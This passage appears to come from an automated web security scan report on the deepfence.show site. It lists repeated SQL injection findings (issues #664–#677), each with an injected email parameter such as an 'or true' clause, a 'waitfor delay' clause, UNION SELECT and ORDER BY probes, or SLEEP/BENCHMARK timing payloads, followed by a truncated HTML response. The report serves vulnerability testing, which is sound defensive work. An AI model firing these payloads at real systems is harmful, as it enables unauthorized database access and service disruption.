src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #664\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\") or true--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #665\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 4\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #666\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io waitfor delay '00:00:05'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #667\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #668\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\\\\\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@deepfence.io\nCWE-ID CWE-89\nIssue Number #669\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #670\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #671\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #672Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #673\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io %' AND 8310=8311 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #674\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 12\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #675\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #676\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #677\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' AND id IS NULL; --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 